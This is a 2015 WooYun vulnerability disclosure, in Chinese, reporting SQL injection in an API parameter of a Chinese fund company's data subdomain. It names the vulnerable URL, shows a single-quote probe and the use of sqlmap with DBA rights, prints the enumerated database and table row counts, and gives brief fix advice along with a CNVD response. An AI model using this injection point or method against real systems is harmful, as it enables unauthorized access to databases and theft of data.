当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140841

漏洞标题:万银财富基金某重要分站存在SQL注入(DBA权限+几千万敏感信息泄漏)

相关厂商:万银财富

漏洞作者: 路人甲

提交时间:2015-09-15 14:39

修复时间:2015-11-01 15:56

公开时间:2015-11-01 15:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

存在SQL注入,为DBA权限,可致几千万敏感信息泄漏

详细说明:

在测试过程中,抓包得到一个地址
http://data.wy-fund.com/api.php?op=getsameindex&indexid=885001

0-0.jpg


测试
http://data.wy-fund.com/api.php?op=getsameindex&indexid=885001'

0-1.jpg


发现两个界面不一样。indexid存在注入。
这些数据干什么的呢?不会泄漏出什么信息吧?
直接上sqlmap测试吧,可以发现是DBA权限,而且有上千万的数据信息!~~~

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


6.jpg


7.jpg


这些信息就不继续测试了!~~~

available databases [6]:
[*] caihui
[*] caihui1
[*] cqgd
[*] information_schema
[*] mysql
[*] performance_schema
Database: caihui1
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| cihdquote                   | 12172659 |
| etfcrstocks                 | 10143050 |
| newstype                    | 9003508 |
| chdquote                    | 8853576 |
| chdquote_copy               | 8018850 |
| cihdquote_copy              | 7231993 |
| newsindus                   | 6946815 |
| newsfin                     | 3851068 |
| fundbdy                     | 2605306 |
| nav                         | 2211012 |
| dernav                      | 2210817 |
| encurnav_der                | 2205481 |
| newsauth                    | 1606726 |
| fhdquote                    | 1528331 |
| tab_comp_ma                 | 1515590 |
| tab_comp_macd               | 1515590 |
| tab_comp_rsi                | 1515590 |
| tab_comp_temp_kdj_lh        | 1515590 |
| tab_comp_temp_lh            | 1515590 |
| tab_comp_kdj                | 1484053 |
| sholding                    | 1209250 |
| profchg                     | 944152  |
| sholding_s                  | 882554  |
| iport                       | 637662  |
| itprofile                   | 536543  |
| dispara_fund                | 502629  |
| `itprofile-20140614`        | 471439  |
| iport_s                     | 467840  |
| chgrf_f                     | 448683  |
| finfo                       | 396251  |
| nav_cur                     | 391090  |
| curnav_der                  | 388823  |
| uplog                       | 376388  |
| lfshare                     | 336837  |
| tstat                       | 259997  |
| `finfo--`                   | 257218  |
| fparty                      | 254925  |
| temp_stock_list_jj          | 210589  |
| bsholding                   | 176373  |
| benchmark_comparison        | 141219  |
| scfp_new                    | 127732  |
| symbol_comp                 | 103747  |
| unicst_new                  | 101801  |
| newstext                    | 99915   |
| chgrf                       | 97491   |
| securitycode                | 86094   |
| etfcrinfo                   | 77937   |
| `securitycode---`           | 73742   |
| securitycode_copy           | 73620   |
| chgrf_20141030              | 72602   |
| mfdhispd                    | 67056   |
| ntrad                       | 63208   |
| icst                        | 63085   |
| fratios                     | 62316   |
| scstc                       | 61189   |
| fundshare_chg               | 59409   |
| qdshold                     | 54710   |
| fholder                     | 48682   |
| new_funds_index_wy          | 47760   |
| fshare                      | 47305   |
| new_funds_index_wy_1121     | 46280   |
| fundtypes                   | 45954   |
| tradedate                   | 45580   |
| assetal                     | 44100   |
| new_funds_index_wy_2        | 43940   |
| new_funds_index_wy_4        | 43638   |
| new_funds_index_wy_3        | 43460   |
| wy_tab_gp_week              | 35948   |
| p_record                    | 33645   |
| bsheet                      | 22569   |
| wy_tab_gp_mothlow           | 21775   |
| scfp                        | 21541   |
| fholder_chg                 | 21511   |
| assetal_copy                | 20929   |
| assetal_copy1               | 20929   |
| bsheet_new                  | 20413   |
| icst_new                    | 19581   |
| fundsta                     | 15409   |
| tab_fixedinvestment         | 12456   |
| qdiport                     | 11778   |
| wy_tab_gp_week_h            | 9864    |
| tab_symbol_rank             | 9486    |
| fundmg                      | 9399    |
| jjtzbz                      | 9385    |
| tab_comp_ma_120             | 9369    |
| fund_diagnose_record        | 9172    |
| fpchg                       | 8942    |
| temp_manager_performance    | 8764    |
| dhistory                    | 7056    |
| csholding                   | 6872    |
| prizestate                  | 6512    |
| fcmg                        | 6491    |
| tab_comp_ma_120_bak         | 6250    |
| temp_fundtype_wy            | 5557    |
| wy_tab_gp_quarter           | 5314    |
| avgrmmonf                   | 4870    |
| temp_stock_chg              | 4453    |
| temp_stock_chg_jj           | 4453    |
| temp_stock_chg_test         | 4453    |
| jjzx                        | 4425    |
| mfdhistory                  | 4182    |
| temp_manager_performance_jj | 4149    |
| tab_comp_uplog              | 4092    |
| fund_benchmark              | 3925    |
| temp_gr_year                | 3708    |
| jjglr                       | 3701    |
| jjtgr                       | 3697    |
| temp_buy_info               | 3697    |
| temp_issue                  | 3697    |
| temp_main_fund              | 3697    |
| ofip                        | 3638    |
| ofprofile                   | 3638    |
| qdfhold                     | 3547    |
| temp_info_new               | 3542    |
| wycf_zq_temp_ph             | 3542    |
| temp_asset                  | 3493    |
| temp_nav_ofund              | 3152    |
| wycf_zq_temp_nav_ofund      | 3152    |
| wycf_zq_temp_fhb            | 3039    |
| temp_status                 | 3034    |
| tab_pzx                     | 2941    |
| tab_dxfzbj                  | 2927    |
| wycf_zq_howbuy_ph           | 2863    |
| wy_tab_gp_symbol            | 2553    |
| wycf_zq_howbuy_kfnav        | 2479    |
| `ofprofile-20140604`        | 2329    |
| temp_manager_new            | 2197    |
| wycf_zq_sina_ph             | 2000    |
| curfscode                   | 1912    |
| temp_issue_jj               | 1777    |
| temp_nav_ofund_jj           | 1767    |
| temp_info_new_jj            | 1734    |
| risk_assessment_wy          | 1703    |
| wycf_zq_nav                 | 1694    |
| wycf_zq_tt_ofund            | 1685    |
| jjjj                        | 1492    |
| temp_manager_new_jj         | 1466    |
| temp_status_jj              | 1407    |
| fcowner                     | 1172    |
| dsmeeting                   | 1089    |
| tab_comp_symbol             | 1089    |
| fundsaiv                    | 1063    |
| csrcappfin                  | 1055    |
| temp_bonus                  | 1040    |
| tab_recommendlog            | 967     |
| ifundos                     | 922     |
| v9_symbols                  | 843     |
| dhistory_dispara            | 838     |
| qdbhold                     | 690     |
| temp_bonus_jj               | 669     |
| rating_wy                   | 636     |
| temp_split                  | 599     |
| cxfundname                  | 589     |
| itnews                      | 549     |
| tab_tg_jjtj                 | 520     |
| temp_nav_curfund            | 485     |
| wycf_zq_temp_hb             | 485     |
| wycf_zq_temp_nav_hbfund     | 485     |
| temp_nav_strufund           | 355     |
| fundda                      | 344     |
| wycf_zq_howbuy_fbnav        | 333     |
| wycf_zq_howbuy_ph_hb        | 333     |
| company_rating_wy           | 298     |
| fundiconvert                | 283     |
| fsmeeting                   | 246     |
| temp_nav_curfund_jj         | 227     |
| tsmeeting                   | 224     |
| temp_split_jj               | 210     |
| fcshare                     | 188     |
| tab_jmtj_mc                 | 156     |
| tab_jmtj_chang              | 144     |
| wycf_zq_sina_hbfund         | 140     |
| tab_gptj_mc                 | 112     |
| temp_nav_strufund_jj        | 106     |
| temp_company_stat           | 102     |
| tab_jmtj_duan               | 93      |
| downstate                   | 89      |
| cfip                        | 88      |
| cfprofile                   | 59      |
| tab_gptj_chang              | 55      |
| tab_invest_reinforcement    | 51      |
| fegather                    | 48      |
| tab_jmtj_zhong              | 46      |
| tab_invest_wave_band        | 43      |
| tab_gptj_zhong              | 41      |
| tab_gptj_duan               | 38      |
| companycomm                 | 35      |
| companycomm_bak             | 35      |
| jjxldy                      | 29      |
| temp_nav_cfund_jj           | 22      |
| tablehy07051                | 19      |
| tablehy07052                | 19      |
| tablehy07053                | 19      |
| tablehy1                    | 19      |
| tablehy2                    | 19      |
| tablehy3                    | 19      |
| temp_stock_list             | 13      |
| temp_aa                     | 12      |
| table07051                  | 10      |
| table07052                  | 10      |
| table07053                  | 10      |
| table1                      | 10      |
| table2                      | 10      |
| table3                      | 10      |
| tablez1                     | 10      |
| jjxljj                      | 9       |
| tab_jmtj                    | 9       |
| tab_tg_nxyj                 | 8       |
| cfunds_net_wy               | 7       |
| tab_jmtj_mc_copy            | 7       |
| tab_tg_jjyj                 | 7       |
| temp_nav_cfund              | 7       |
| tablez07052                 | 5       |
| tablez07053                 | 5       |
| tablez3                     | 5       |
| tablez07051                 | 4       |
| wycf_zq_tttempzhishu        | 3       |
| wycf_zq_zhishu              | 3       |
| tab_tg_flmc                 | 2       |
| tab_comp_logrecorder        | 1       |
| tab_new_jjld                | 1       |
| temp_bb                     | 1       |
+-----------------------------+---------+

漏洞证明:

如上

修复方案:

过滤修复
权限限制

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-17 15:54

厂商回复:


CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评论